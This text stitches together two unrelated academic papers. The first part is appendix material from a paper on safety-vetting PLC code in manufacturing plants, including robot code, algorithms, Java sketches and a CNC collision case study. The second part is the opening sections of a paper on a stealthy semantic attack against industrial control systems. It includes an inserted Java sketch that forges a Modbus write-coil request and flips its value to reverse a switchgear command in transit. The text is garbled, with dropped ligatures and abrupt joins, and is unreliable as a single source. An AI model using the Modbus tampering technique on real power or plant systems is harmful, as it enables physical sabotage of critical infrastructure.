    DO[2:Part_AtConveyor@PLC]=OFF
    CALL GO_HOME_AND_GET_VACUUM_GRIPPER
    !Move to CNC1
    J P[10:ROTARM] 80% FINE
    L P[4:ROTARM2] 250mm/sec FINE
    ...
    !Pick up a part from CNC1
    L P[9:CNCSIDE] 100mm/sec FINE
    ...
    LBL[1]
    IF DI[7:Pickup_Confirmation]=ON, JMP LBL[2]
    JMP LBL[1]
    LBL[2]
    WAIT .10(sec)
    !Deposit part on conveyor
    L P[10:ROTARM] 550mm/sec FINE
    ...
    !Notify that part was dropped on conveyor
    DO[2:Part_AtConveyor@PLC]=ON
    WAIT .50(sec)
    DO[2:Part_AtConveyor@PLC]=OFF
    CALL RETURN_VACCUM_GRIPPER_AND_GO_HOME
    DO[6:Pickup_from_CNC1]=OFF
    LBL[3]
Note that the conversion from PLC to C code, using MATIEC, follows a standardized (IEC 61131-3) mechanism. We admit that some semantics, such as counters, timers, etc., may not be very precisely translated to C code, especially because of the implicit effects caused by PLC scan cycles. Furthermore, different vendors may introduce unique features, besides standard ones, that cannot be converted using existing tools. To address these limitations, an alternative option is to directly conduct analysis on native PLC code. We intend to work on this as part of future work. However, we argue that our graph construction methods are orthogonal to the underlying program analysis. In fact, other (potentially advanced) analysis techniques can be used to achieve our goal.

C. Algorithm to Infer Events From Data Traces

Algorithm 3 depicts our algorithm to infer discrete events from continuous data traces collected from physical ICS testbeds.

Algorithm 3 Event Inference
    1:  procedure INFER_EVENTS(DT)
    2:    ET <- empty set
    3:    for DT_i in DT do
    4:      ET_i <- empty set
    5:      {DT_i^v0, DT_i^v1, ..., DT_i^vk} <- DIVIDE_BY_VAR(DT_i)
    6:      for DT_i^vp in {DT_i^v0, DT_i^v1, ..., DT_i^vk} do
    7:        {d'_0, d'_1, ..., d'_m} <- DT_i^vp
    8:        l <- 0
    9:        for l < m do
    10:         if d'_l != d'_{l+1} then
    11:           e <- (state_{d'_{l+1}}, time_{d'_{l+1}})
    12:           ET_i <- ET_i + e
    13:         end if
    14:         l <- l + 1
    15:       end for
    16:     end for
    17:     SORT_BY_TIME(ET_i)
    18:     ET <- ET + ET_i
    19:   end for
    20: end procedure
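For readers who want to experiment with this inference step, the following is a minimal Java sketch of the change-point logic in Algorithm 3, under the assumption that each per-variable trace is available as parallel arrays of sampled values and timestamps. The class and method names are ours for illustration, not part of the authors' implementation.

    import java.util.ArrayList;
    import java.util.List;

    // Minimal sketch of the event-inference step in Algorithm 3 (assumed data layout:
    // one array of sampled values and one array of timestamps per PLC variable).
    public class EventInference {

        // An inferred discrete event: the new state a variable switched to, and when.
        static final class Event {
            final String variable;
            final double newState;
            final double time;
            Event(String variable, double newState, double time) {
                this.variable = variable;
                this.newState = newState;
                this.time = time;
            }
            @Override public String toString() {
                return variable + "->" + newState + " @ " + time + "s";
            }
        }

        // Scan one variable's trace and emit an event at every value change,
        // mirroring the "d'_l != d'_{l+1}" test of Algorithm 3.
        static List<Event> inferEvents(String variable, double[] values, double[] times) {
            List<Event> events = new ArrayList<>();
            for (int l = 0; l + 1 < values.length; l++) {
                if (values[l] != values[l + 1]) {
                    events.add(new Event(variable, values[l + 1], times[l + 1]));
                }
            }
            // The per-trace result is already time-ordered because the samples are.
            return events;
        }

        public static void main(String[] args) {
            // Toy trace of a boolean sensor sampled once per second (illustrative only).
            double[] values = {0, 0, 1, 1, 1, 0};
            double[] times  = {0, 1, 2, 3, 4, 5};
            for (Event e : inferEvents("Part_AtConveyor", values, times)) {
                System.out.println(e);
            }
        }
    }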
D. Example of Event Sequence & Implementation

Motivating Example. Figure 9 depicts how we apply a generated event sequence to exercising the PLC code of the motivating example. In this chart, the x-axis represents time (in seconds), ranging from Begin-of-Test (BOT) to End-of-Test (EOT), and the y-axis denotes the list of events. The effective duration of each event is illustrated as a thick horizontal line, which begins with an empty circle and ends with a filled circle or a cross. The filled circle means the event is terminated by its sender, and the cross indicates it is disabled due to PLC logic. The dotted part on a thick line represents the possible range of the starting point of an event.

Fig. 9: Generating Event Sequence for Motivating Example

For instance, the starting time of event Part_AtConveyor ranges from T+3 to T+39.4 seconds due to the variation of robot delivery time, where T is the time to signal Deliver_Part. Similarly, the beginning of RFID_IOComplete is from T+19 to T+20. This chart shows one permutation of the 7 input events. Since the five events on the top do not bear any temporal dependencies, they can be arranged in any order, one of which is depicted here. These 5 events are Permanent ones and are always enabled until programmatically disabled (e.g., CNC_Part_Ready, Robot_Ready and Part_AtConveyor). Then, the starting timestamps of RFID_IOComplete and Part_AtConveyor are relative to the timestamp T at which all these five events have been triggered. We discretize time with the discretization step being 5 and, in this permutation, we choose to include one discrete version for both of them, RFID_IOComplete(T+20) and Part_AtConveyor(T+10). While RFID_IOComplete(T+20) is a long-lasting event, Part_AtConveyor(T+10) becomes inactive at (T+10)+0.5. In consequence, this sequence will trigger the aforementioned error because Part_AtConveyor(T+10) is turned off prematurely.

Implementation. We simulate each sequence of events by refreshing the values of PLC variables when their corresponding events occur. We then persist the resulting values into a file, which is accessed by the PLC code at the beginning and end of every scan cycle. This mimics the input and output phases of a PLC cycle. To reflect the potential event termination originating from PLC logic, we compute a conjunction between each generated event and its current state in the PLC, and use the result as the new input. For events with certain durations, we set up timers to control their active periods.

Fig. 10: Fischertechnik Testbed for Manufacturing System

E. Details of TPTL Grammar

The grammar of TPTL is built from proposition symbols and timing constraints by Boolean connectives, temporal operators, and freeze quantifiers. The timing constraints of TPTL are of the form pi1 <= pi2 and pi1 congruent to pi2 modulo the constant d (time pi1 is congruent to time pi2 modulo d). The abbreviations x (for x+0), =, <, >, >=, as well as the usual Boolean connectives and constants, are defined as usual. The temporal operators can be either 1) the next formula, written as a circle followed by p, which asserts about a timed state sequence that the second state in the sequence satisfies the proposition p, or 2) the until formula p1 U p2, which asserts about a timed state sequence that there is a state satisfying the proposition p2, and all states before this p2-state satisfy the proposition p1. Additional temporal operators are defined as usual. In particular, the eventually operator stands for true U phi, and the always operator stands for the negation of eventually-not-phi. The freeze quantifier can be associated with a variable x as x.phi, and it freezes x to the time of the local temporal context.
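To make the notation concrete, the two requirements below show how properties of the manufacturing testbed could be written in this grammar. This is our own illustration: only the first formula is the specification actually checked in the case study of Appendix G, and T_max stands for an assumed upper bound on a CNC's process time (the case study observes 3 to 8 seconds for CNC 1).

    \square \, (\mathit{CNC\_Busy} \rightarrow \neg \mathit{Part\_Arrival})
    \square \, x.(\mathit{Process\_Start} \rightarrow \Diamond \, y.(\mathit{Process\_End} \wedge y \le x + T_{max}))

The second formula uses the freeze quantifiers: x is bound to the time of the state where Process_Start holds and y to the time of the matching Process_End state, so the constraint y <= x + T_max bounds the duration of the operation.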
F. Fischertechnik Testbed

This testbed is divided into four cells (Cell 1 to Cell 4), each of which is equipped with a conveyor belt and one or two IR sensors that detect the presence of parts, and is controlled by a PLC. The testbed contains two CNC machines (CNC 1 and CNC 2) located in Cell 2 and Cell 3, respectively. Two rams (Ram 1 and Ram 2) are deployed to move parts from Cell 1 to Cell 2 and from Cell 3 to Cell 4, respectively. These CNC machines and rams are also controlled by separate PLCs. In this testbed, a PLC is emulated by a Raspberry Pi board running an OpenPLC server to execute PLC code. All Raspberry Pi boards are connected together via Ethernet and linked via Modbus.

The system starts when a part enters the manufacturing line from Cell 1 and is passed to Cell 2 by Ram 1 for the operation processed by CNC 1. The part is then moved to Cell 3 for the operation processed by CNC 2. When both CNC operations are complete, the part is transferred to the conveyor in Cell 4 by Ram 2 and leaves the testbed.

It is possible to place multiple parts on the testbed at the same time and process the parts sequentially. However, due to physical limitations in the testbed (e.g., the limited length of the conveyor belt, long operation times for the rams and CNC machines), restrictions should be taken into account when developing the control logic.

Fig. 11: A TECG of Case #7 (CNC-Part Collision)

G. Case Study on Scenario #7 CNC-Part Collision

Description. This case focuses on the section where a part is processed by CNC 1 and is to be transferred to CNC 2. Since the testbed has a linear setup, the design and deployment of the CNC machines are based upon an assumption: when a CNC finishes an operation and is ready to discharge a part, its successive CNC should also be ready to receive the part; this avoids a downgrade in system throughput due to congestion in the linear model. That is, in this case, CNC 2 is expected to be ready (i.e., the preceding part has been discharged from CNC 2) when CNC 1 finishes a process and discharges a part. In a normal manufacturing run, CNC 2 sends a signal to the PLC when a part is processed. The PLC then activates Conveyor 3 to transfer the part from CNC 2 to the next cell (Ram 2). Similarly, when a part is processed by CNC 1, Conveyors 2 and 3 are activated by the PLC to transfer the part from CNC 1 to CNC 2.

A potential issue may occur in this linear setup when the aforementioned assumption no longer holds due to changes in the time correlation between the CNC machines. This could happen either because of a worn-out component in a CNC that leads to a longer CNC cycle time, or because of a careless change in the manufacturing plan (e.g., an operator speeds up the conveyor with a desire for higher production performance).

Safety Vetting. Using the proposed analysis method, we first construct the TECG (as shown in Figure 11) by analyzing the PLC and CNC code. In this case, the correlation between the two CNC machines and the PLC can be revealed in this step.
From this TECG, we can determine that the event CNC2_Process is followed by the event CNC2_Finished and the event CNC1_Process is followed by the event CNC1_Finished. These event dependencies discovered from the inter-device communication help reduce the number of possible permutations from 13700 to 898 (without taking time into account). Then, we proceed to the temporal property mining process that produces time correlations and temporal invariants for the events. In this case, the process times T_CNC1Process and T_CNC2Process of both CNC machines are obtained, which are associated with the time durations between Process_Start and Process_End of both CNCs. With these time invariants being considered, the number of permutations becomes 6442, 24358 and 79818 for VETPLC-TSEQS-2, VETPLC-TSEQS-5 and VETPLC-TSEQS-10, respectively.

In this case, the CNC 1 process time, T_CNC1Process, ranges from 3 to 8 seconds and the CNC 2 process time, T_CNC2Process, ranges from 2 to 7 seconds. As mentioned above, anomalies may occur when either CNC 2 takes longer to finish its task or CNC 1 discharges a part earlier. Under either circumstance, it is possible that the part discharged from CNC 1 arrives in CNC 2 before the precedent part originally in CNC 2 fully leaves the cell. As a result, the successive part may collide with the preceding part as well as CNC 2 and cause safety issues. This violates the safety specification, always(CNC_Busy implies not Part_Arrival), which indicates that a part must not arrive at a CNC when it is in a busy state. Through the VETPLC-TSEQS test processes, the system determines that this violation may occur when CNC 1 is running at a speed from 3273 rpm to 6000 rpm and CNC 2 is running at a speed from 1714 rpm to 2667 rpm with VETPLC-TSEQS-2. The same violation can also be captured using VETPLC-TSEQS-5 and VETPLC-TSEQS-10 with higher precision with respect to the error-triggering speed ranges (see Table IV for details).
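To make the violated property concrete, here is a small, self-contained Java sketch (our illustration, not the authors' tooling) that replays an ordered list of timestamped events against the specification "a part must never arrive at a CNC while that CNC is busy": it tracks the busy interval of CNC 2 and flags any part arrival that falls inside it. The event names and the trace are assumptions for the example.

    import java.util.ArrayList;
    import java.util.List;

    // Toy monitor for the safety property "no part arrival while the CNC is busy"
    // over an ordered trace of (time, event) pairs.
    public class CollisionMonitor {

        record TimedEvent(double time, String name) {}

        static List<Double> findViolations(List<TimedEvent> trace) {
            List<Double> violations = new ArrayList<>();
            boolean cnc2Busy = false;
            for (TimedEvent e : trace) {
                switch (e.name()) {
                    case "CNC2_Process":  cnc2Busy = true;  break;  // CNC 2 starts an operation
                    case "CNC2_Finished": cnc2Busy = false; break;  // CNC 2 discharges the part
                    case "Part_Arrival_CNC2":
                        if (cnc2Busy) violations.add(e.time());     // property violated here
                        break;
                    default: break;  // other events are irrelevant to this property
                }
            }
            return violations;
        }

        public static void main(String[] args) {
            // CNC 2 needs 7 s here, but the next part arrives after only 4 s: a collision.
            List<TimedEvent> trace = List.of(
                    new TimedEvent(0.0, "CNC2_Process"),
                    new TimedEvent(4.0, "Part_Arrival_CNC2"),
                    new TimedEvent(7.0, "CNC2_Finished"));
            System.out.println("Violations at t = " + findViolations(trace));
        }
    }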
Towards Automated Safety Vetting of PLC Code in Real-World Plants

Mu Zhang, Chien-Ying Chen, Bin-Chou Kao, Yassine Qamsane, Yuru Shao, Yikai Lin, Elaine Shi, Sibin Mohan, Kira Barton, James Moyne and Z. Morley Mao

Department of Computer Science, Cornell University; Department of Computer Science, University of Illinois at Urbana-Champaign; Information Trust Institute, University of Illinois at Urbana-Champaign; Department of Mechanical Engineering, University of Michigan; Department of Electrical Engineering and Computer Science, University of Michigan

[email protected], [email protected], {cchen140,sibin}@illinois.edu, [email protected], {yqamsane,bartonkl,moyne}@umich.edu, {yurushao,yklin,zmao}@umich.edu
An_Enhanced_Multi-Stage_Semantic_Attack_Against_Industrial_Control_Systems.pdf
Industrial Control Systems (ICS) play a very important role in national critical infrastructures. However, the growing interaction between the modern ICS and the Internet has made ICS more vulnerable to cyber attacks. In order to protect ICS from malicious attacks, intrusion detection technology emerges. By analyzing the network meta data or the industrial process data, Intrusion Detection Systems (IDS) can identify attacks that violate communication protocols or system specifications. However, the existing intrusion detection technology is not omnipotent, which opens up a back door for some more advanced attacks. In this work, we design an enhanced multi-stage semantic attack against ICS, which is undetectable by existing IDS. By hijacking the communication channels between the Human Machine Interface (HMI) and the remote Programmable Logic Controllers (PLCs), the attacker can manipulate the measurement data and control instructions simultaneously. The fake measurement data deceives the human operator into making wrong decisions. Furthermore, the attacker can strategically manipulate the semantic meaning of control instructions according to system state transition rules. In the meanwhile, a fake view of measurement data is presented to the HMI to conceal the on-going malicious attack. This attack is totally stealthy since the message sizes and timing, the command sequences, and the system state values are all legitimate. Consequently, this attack can secretly bring the system into critical states. Experimental results have verified the strong attack ability of the proposed attack.
SPECIAL SECTION ON DISTRIBUTED COMPUTING INFRASTRUCTURE FOR CYBER-PHYSICAL SYSTEMS

Received September 29, 2019, accepted October 21, 2019, date of publication October 25, 2019, date of current version November 7, 2019.
Digital Object Identifier 10.1109/ACCESS.2019.2949645

An Enhanced Multi-Stage Semantic Attack Against Industrial Control Systems

YAN HU1, YUYAN SUN2,3, YOUCHENG WANG4, AND ZHILIANG WANG1
1School of Computer and Communication Engineering, University of Science and Technology Beijing, Beijing 100083, China
2Beijing Key Laboratory of IoT Information Security, Institute of Information Engineering, Chinese Academy of Sciences, Beijing 100195, China
3School of Cyber Security, University of Chinese Academy of Sciences, Beijing 100195, China
4Science and Technology on Complex System Control and Intelligent Agent Cooperation Laboratory, Beijing Electro-Mechanical Engineering Institute, Beijing 100074, China

Corresponding author: Yan Hu ([email protected])

This work was supported in part by the National Natural Science Foundation of China under Grant 61802016 and Grant 61702506, in part by the National Key Research and Development Program of China under Grant 2017YFB0802805, in part by the National Social Science Foundation of China under Grant 17ZDA331, in part by the Project funded by China Postdoctoral Science Foundation under Grant 2018M641198, and in part by the Fundamental Research Funds for the Central Universities under Grant FRF-BD-18-016A.

The associate editor coordinating the review of this manuscript and approving it for publication was Zhen Ling.

INDEX TERMS Industrial control systems, multi-stage semantic attacks, state transition, stealthy attacks.

I. INTRODUCTION

Nowadays, Industrial control systems (ICS) [1] play a quite important role in a variety of industrial processes, such as manufacturing, public facilities (e.g., buildings and airports), power generation and distribution [2]-[4], chemical processing [5], water treatment [6], oil and gas transportation [7], or large-scale communication [8]. The rapid development of Internet Technology (IT) facilitates ICS to realize remote process control and intelligent decision making. However, high exposure to open networks has made ICS an attractive target for malicious attackers [9], [10]. The summer of 2010 was a landmark for ICS security. By that time the core control program of the Natanz uranium enrichment base in Iran was infected by an unprecedentedly sophisticated cyber worm called "Stuxnet". The centrifuges for uranium enrichment were forced to accelerate unconventionally and were eventually damaged, which caused a huge loss to the entire nuclear plant. In 2015, the notorious Trojan malware "BlackEnergy3" attacked the Ukrainian power grid. False commands sent to relays triggered unconventional circuit disconnections, immediately followed by a large-scale blackout. At Black Hat 2017 [11], Dr. Staggs pointed out that cyber and physical attacks can invade the programmable automation controllers and OPC (OLE for Process Control) servers easily by exploiting wind farm design and implementation flaws. Additionally, they designed corresponding attack tools to launch attacks on actual wind farms. So many ICS security incidents indicate that ICS security has become a critical global issue [12], [13].
Intrusion Detection Systems (IDS) provide a promising solution for protecting ICS [14], [15]. IDS are a type of software designed to find indications that information systems have been compromised. Traditional intrusion detection technology is mainly classified into two categories, signature-based and anomaly-based. Signature-based IDS, also called misuse-based, build a blacklist containing the signatures of known attacks, and raise alarms when the system behavior matches any of these signatures. Anomaly-based IDS are mainly used to detect anomalies that violate the normal behavior patterns of a target system. Therefore, a normal behavior model of the target system should be constructed. Model parameters can be learnt from unaffected system operating data. While applying intrusion detection to ICS, the industrial process data (e.g., measurement data and control instructions) is another important factor to consider [16]. If the value of a process variable is outside its normal range or breaks the fundamental laws of nature, an alarm should be raised.

Existing intrusion detection technology has proved to be useful but not omnipotent. Recently, Kleinmann et al. [17] have proposed a multi-stage semantic attack against ICS. This attacker can drive the target system to a critical state by reversing the semantic meaning of control instructions and presenting a fake view of measurement data to the system operator at the same time. However, the attacker cannot guarantee to realize the attack goal, since it just randomly chooses some instructions to reverse. In this work, we design an enhanced and strategic multi-stage semantic attack against ICS, which relies on the system state transition rules to precisely decide which control instructions to reverse. The enhanced semantic attack can significantly improve the attack success rate while maintaining its stealthiness. The key contributions of this work are summarized as follows:

- We analyze the relationships between system states and control instructions, and build a system state transition graph that can accurately characterize the dynamic behavior of ICS.
- We design an enhanced multi-stage semantic attack against ICS. By exploiting system state transition rules, the attacker can develop accurate attack strategies, which can increase the attack success rate significantly.
- We launch the enhanced multi-stage semantic attack on a simulated industrial control system to verify its stronger attack ability compared to the existing semantic attack.

The rest of the paper is organized as follows. We introduce the research literature about intrusion detection in Section II. Some preliminaries of the enhanced semantic attack are presented in Section III. In Section IV, we elaborate on the principles of the enhanced multi-stage semantic attack against ICS. Experiments are conducted in Section V to verify the stronger attack ability of the enhanced multi-stage semantic attack. Finally, a conclusion is drawn in Section VI.

II. RELATED WORK

Due to the growing openness of ICS, cyber attacks against traditional information systems also threaten the security of ICS. Traditional intrusion detection technology mainly falls into two classes: signature-based and anomaly-based. The former mainly relies on the accurate signatures of malicious attacks.
System behavior that matches any existing attack signature is considered anomalous. On the contrary, the latter depends on a normal behavior model. Any system behav- ior that deviates from this model should be agged as an anomaly. Generally speaking, attacks against ICS usually violate protocol speci cations or cause abnormal network traf cs, and the physical constraints of ICS are likely to be broken during attack. Therefore, we introduce the intrusion detection technology on ICS from three aspects: network protocol analysis, network traf c mining, and process data analysis. A. NETWORK PROTOCOL ANALYSIS-BASED INTRUSION DETECTION Network protocols de ne a set of rules to specify how net- work devices should format, transmit and process informa- tion. Therefore, intrusion detection rules can be extracted from network protocols. Any system behavior that violates the detection rules is judged to be abnormal. Some open protocols are commonly used in ICS communication, e.g., ModBus, DNP3, ICCP/TASE.2. These protocols are vulner- able to a variety of malicious attacks such as eavesdrop- ping, tampering and counterfeiting, since ICS were designed to run in relatively closed environments and security was rarely considered in the design of industrial communication protocols. Cheung et al. [18] extracts a normal system behavior model from the industrial protocol speci cations. The model formalizes legal data values and legal relationships between different data elds. Furthermore, a set of communication modes are built according to data transmission ports, trans- mission directions and security requirements of ICS. Any behavior that violate the normal behavior model or the communication modes should be agged as an anomaly, so this detection technique also belongs to the anomaly-based intrusion detection. Morris et al. [19] construct signatures for ModBus protocol vulnerabilities by exploiting a famous intrusion detection system Snort . Communication data that matches any of these signatures is identi ed as an anomaly. Moreover, traditional IDS can be tailored or improved for intrusion detection on ICS. Lin et al. [20] successfully realize intrusion detection on ICS by implanting a DNP3 protocol parser into Bro, a network intrusion detection system devel- oped by the University of Berkeley. In addition to open protocols, proprietary protocols also play an important part in ICS communication. IDS based on proprietary protocol analysis has emerged. Hong et al. [21] 156872 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS extract speci cations from the IEC 61850 standards (e.g., Generic Object Oriented Substation Event (GOOSE) and Sample Value technology (SV)), based on which to identify abnormal or malicious behaviors in electric power substations. In [22], legal and illegal network traf c patterns are de ned based on the protocol speci cations of power systems. These patterns are further converted into Snort rules for intrusion detection. As described above, intrusion detection based on network protocol analysis mainly relies on the accurate de nition of detection rules, and usually yields a high false alarm rate and incurs a large message-parsing time overhead. Intrusion detection based on network traf c mining can overcome these shortcomings to some extent. B. NETWORK TRAFFIC MINING-BASED INTRUSION DETECTION Most ICS have xed business logics, static and simple net- work topologies, and a small number of programs. 
There- fore, traf cs in industrial networks are stable in most cases. Unusual traf c patterns generally indicate the occurrence of an anomaly, which is the main motivation of the network traf c mining-based intrusion detection. Traditional IDS based on network traf c mining [23] mainly rely on the analysis of network meta data, includ- ing IP addresses (i.e., source IP address for outbound packets and destination IP address for inbound packets), transmission ports, traf c durations, and packet intervals. Applying data mining techniques to network meta data can identify system anomalies effectively. Supervised [24] and semi-supervised [25] clustering, single-class [26] or multi-class [27] support vector machine, mixed Gaussian model [28], fuzzy logic [29][31], neural network [32], [33] and deep learning [34] are commonly used techniques for traf c mining. These techniques aim to model the non-linear relationships between network traf cs and system behaviors. The relationship model and real-time traf c data are used to investigate the current status of the system, and then detect malicious attacks timely. However, analyzing a large number of traf c features undoubtedly incurs a high computational overhead. Therefore, techniques like principal component analysis [35] and ant colony optimization [36] are used to remove redundant traf c features, thus to reduce computa- tional overhead. Intrusion detection techniques based on protocol analysis and traf c mining are borrowed from the traditional network intrusion detection domain. They are mainly designed for conventional information systems. A big difference between ICS and the traditional information systems (i.e., ICS are closely related to the physical world) makes these techniques dif cult to identify attacks against physical processes, since these attacks may not violate network protocol speci ca- tions or cause abnormal network traf cs. Hence, the intru- sion detection technology based on process data analysis has emerged.C. PROCESS DATA ANALYSIS-BASED INTRUSION DETECTION Industrial process data is another important information source for intrusion detection on ICS. It is likely for a system operator to make wrong decisions [37] if the process data is secretly counterfeited or tampered with, and eventually cause lethal damage to ICS. Generally, the deviation between the observed and expected process values can determine whether an attack has occurred [38]. In [39], all process variables are divided into three classes: constants, enumeration, and con- tinuous values. Each process variable has a normal behavior pattern. Once the monitored value of a process variable does not conform to its normal behavior pattern, an alarm is raised. In [40], system states are denoted by measurement data reported by a group of remote sensors, and a corresponding state distance measurement method is presented. Anomalies can be detected by inspecting the distance between the current state and the critical states. Time series forecasting provides another potential solution for intrusion detection on ICS. This technology can precisely predict the future outputs of ICS, which are then compared with the monitored outputs to generate residuals. By applying proper statistical techniques to the residuals, IDS can detect malicious attacks effectively. In general, the residual series conforms to a Gaussian distribution during normal operation of ICS. 
If an attack occurs, there will be a signi cant deviation between the actual and expected system behaviors, i.e., the residuals deviate from 0 notably [41]. Two kinds of intrusion detection techniques based on residual analysis are summa- rized in [42]: sequential detection and change detection. The rst technique can identify anomalies as quickly as possible. In other words, it determines the shortest residual sequence based on which IDS can make a judgement. The second technique identi es an anomaly if the residual [43] or the cumulative residual [16] exceeds a prede ned threshold at a certain time point. Recently, Kleinmann et al. [17] propose a multi-stage semantic attack against ICS by tampering with the mea- surement data and the control instructions simultaneously. They state that the Modbus protocol has no security protec- tion mechanism or message integrity protection mechanism, which opens up a back door for malicious attackers. This vulnerability enables the adversary to reverse the semantic meaning of control instructions and present a fake view of measurement data to the HMI at the same time. However, this attack is sometimes futile, because it cannot exactly decide which control instructions to manipulate. Randomly reversing some instructions cannot guarantee to realize the attack goal. In this work, we design an enhanced multi-stage semantic attacks against ICS, which makes full use of the system state transition rules and strategically decides which control instructions to reverse, thus to bring the target system into dangerous situations precisely. The enhanced semantic attack is totally undetectable by traditional IDS because all process values are legal during this attack. Additionally, it can improve the attack success rate signi cantly when compared VOLUME 7, 2019 156873 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 1. The Electricity Distribution Subsystem (Following [17]). to the existing instruction-reversing semantic attack proposed in [17]. III. PRELIMINARIES In this section, we present some preliminaries of the enhanced semantic attack, including the communication mechanism of Modbus, the architecture of the electrical distribution systema typical industrial system, and the underlying adversary model. A. MODBUS ModBus is a de facto application layer protocol for ICS. This protocol supports a master-slave communication mode between different control devices, even if they are within different types of buses or networks. Most Modbus sys- tems use TCP as the communication layer protocol. A Mod- bus/TCP message is embedded in TCP segments and TCP port 502 is reserved for Modbus communications. In Mod- bus communications, usually the HMI acts as the unique master and the remote PLCs act as slaves. In a trans- action, the master requests process data from the slaves or issues control instructions to the slaves. The slaves respond by sending the requested data to the master or by performing the control instructions. The request mes- sage from the master contains a unique transaction ID, which should be contained in the corresponding response message. A Modbus Protocol Data Unit (PDU) consists of two elds: a single-byte Function code and a variable-size Payload (lim- ited to 252 bytes). The Function code speci es the operation to be taken, and the Payload contains parameters required by the function invocation. For example, the Payload of a read request consists of two elds, a reference number and a bit/word count. 
The former speci es the starting memory address for reading. The latter speci es the number of mem- ory object units to be read. The payload of the corresponding response message is comprised of two parts: byte count and data, which respectively record the length of data in bytes and the data contents that were read. In addition to the startingmemory address, the payload of a write message has another eld that speci es the data to be written. Unfortunately, Modbus has little ability to defend itself against malicious attacks, e.g., data tampering or counterfeit- ing. Moveover, Modbus only uses TCP sequence numbers to provide simple session semantics, but cannot ensure message integrity or long-term session semantics. Therefore, TCP session hijacking becomes quite straightforward. B. ELECTRICITY DISTRIBUTION SYSTEM An electricity supply chain is typically comprised of three subsystems: generation, transmission, and distribution, as illustrated in Fig. 1. The transmission network connects the generation system with the distribution system. Elec- tricity is transmitted from generation sites to remote dis- tribution substations along high-voltage transmission lines. The high voltage (138 kV to 765 kV) is then converted to medium-voltage (600V to 35kV) by substation transform- ers. A group of medium-voltage circuits fan out from the substation. The medium voltage is further stepped down to the low voltage (commonly 120/240V) by the distribution transformers close to end users. In this work, we mainly discuss the distribution subsystem between the substations and distribution transformers, which is the target system of the ``BlackEnergy" cyber-attack. In order to improve reliability, distribution circuits are usu- ally equipped with ``tie switches'' (also called switchgears, which are normally disconnected) to other circuits. If one of the circuits encounter an unintentional fault, it will be connected to another circuit by an adjacent switchgear. Thus, electricity ows into the faulted circuit and some necessary services are restored. The switchgears can be operated auto- matically or manually from the HMI. A simpli ed model of the subsystem is shown in Fig. 2. Two medium-voltage circuits fan out from the substation. There are six PLCs (i.e., PLC01PLC06) along the top circuit and four PLCs (i.e., PLC08PLC11) along the bottom circuit. Addi- tionally, the two distribution lines are interconnected by a normally open switchgear that is controlled by PLC07. 156874 VOLUME 7, 2019 Y. Hu et al. : Enhanced Multi-Stage Semantic Attack Against ICS FIGURE 2. The Electricity Distribution Subsystem. C. ADVERSARY MODEL In the adversary model, we suppose that the attacker can penetrate into the control network and launch a Man-In-The- Middle (MITM) attack between the HMI and remote PLCs. On the hijacked communication link, all network packets can be eavesdropped, replayed, delayed or deleted before reach- ing their destinations. Furthermore, the attacker can modify the packet contents and even take over the HMI to fabricate malicious control instructions. The goal of the adversary is to disrupt the normal operation of ICS and cause fatal damages to the physical system. Furthermore, suppose that the adversary has gained suf - cient knowledge of the ICS architecture, the industrial pro- cess and the way to manipulate the target system. 
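Before the adversary model is narrowed further, it is worth seeing how small the required modification actually is. The sketch below is our own illustration of a Modbus/TCP "write single coil" request (frame layout per the public Modbus/TCP specification) and of the two-byte rewrite a man-in-the-middle would need to turn an "open" command into a "close" command. The coil address and the mapping of ON/OFF values to switchgear states are assumptions made for the example, not details taken from the paper.

    import java.util.Arrays;

    // Illustrative sketch: a Modbus/TCP "write single coil" request and the in-place
    // tampering a man-in-the-middle could perform. Frame layout: MBAP header
    // (transaction id, protocol id, length, unit id) followed by the PDU
    // (function code 0x05, coil address, coil value).
    public class ModbusTamperSketch {

        static byte[] writeSingleCoilRequest(int transactionId, int unitId, int coilAddress, boolean on) {
            byte[] frame = new byte[12];
            frame[0] = (byte) (transactionId >> 8);
            frame[1] = (byte) transactionId;
            frame[2] = 0; frame[3] = 0;              // protocol id = 0 (Modbus)
            frame[4] = 0; frame[5] = 6;              // remaining length: unit id + 5-byte PDU
            frame[6] = (byte) unitId;
            frame[7] = 0x05;                         // function code: write single coil
            frame[8] = (byte) (coilAddress >> 8);
            frame[9] = (byte) coilAddress;
            frame[10] = (byte) (on ? 0xFF : 0x00);   // 0xFF00 = ON, 0x0000 = OFF
            frame[11] = 0x00;
            return frame;
        }

        // Only the value bytes change: message size, function code, transaction id
        // and address all stay legitimate, which is what keeps the attack stealthy.
        static void flipCoilValue(byte[] frame) {
            boolean currentlyOn = (frame[10] & 0xFF) == 0xFF;
            frame[10] = (byte) (currentlyOn ? 0x00 : 0xFF);
        }

        public static void main(String[] args) {
            byte[] original = writeSingleCoilRequest(0x0001, 1, 7, false); // operator: open switchgear
            byte[] tampered = original.clone();
            flipCoilValue(tampered);                                       // attacker: close it instead
            System.out.println("original: " + Arrays.toString(original));
            System.out.println("tampered: " + Arrays.toString(tampered));
        }
    }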
Here, we use a somewhat weaker type of attack model: the attacker can penetrate into the control network, and launch MITM attacks on one or more HMI-PLC communication links simultaneously. However, this model is assumed to be stateless, i.e., it does not tamper with TCP sequence numbers. Therefore, this model cannot delete existing messages or inject fake ones. It can only manipulate the contents of existing packets.

IV. ENHANCED MULTI-STAGE SEMANTIC ATTACK

In this section, we elaborate on the strategy of the enhanced multi-stage semantic attack against ICS.

A. DEFINITION OF SYSTEM STATES

Suppose that an electricity distribution subsystem involves a set of configurable state variables denoted by {x_1, x_2, ..., x_N}, where N is the total number of state variables, and x_i in {-1, 1} (1 <= i <= N) is the ith state variable, which denotes the status (closed or open) of the ith switchgear. Hence, a state vector x can be used to represent the status of the entire system at a certain time point:

    x = (x_1, x_2, ..., x_N).    (1)

All possible values of the state vector x constitute a set X. In the electricity distribution subsystem, X is comprised of three mutually exclusive subsets: a normal state set N, a fault state set F and a critical state set C. The normal states in N indicate that the system is operating normally. If there occur some unavoidable disturbances or system faults, the system enters a fault state contained in F to restore some necessary services and finally return to the normal state. However, if the system encounters some malicious attacks, it will be brought into some dangerous or unwanted situations (i.e., critical states), like large-scale blackouts.

The normal state set N of the electricity distribution system is formalized as follows:

    N = {x^Nor_1, x^Nor_2, ..., x^Nor_L},    (2)

where N is a subset of X, L is the total number of normal state vectors, and x^Nor_l (1 <= l <= L) is the lth normal state vector, which consists of the values of the N state variables:

    x^Nor_l = (x^Nor_l,1, x^Nor_l,2, ..., x^Nor_l,N).    (3)

